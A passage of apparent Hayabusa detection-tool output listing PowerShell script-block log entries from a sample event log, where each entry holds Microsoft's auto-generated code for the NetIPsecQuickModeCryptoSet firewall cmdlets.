Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 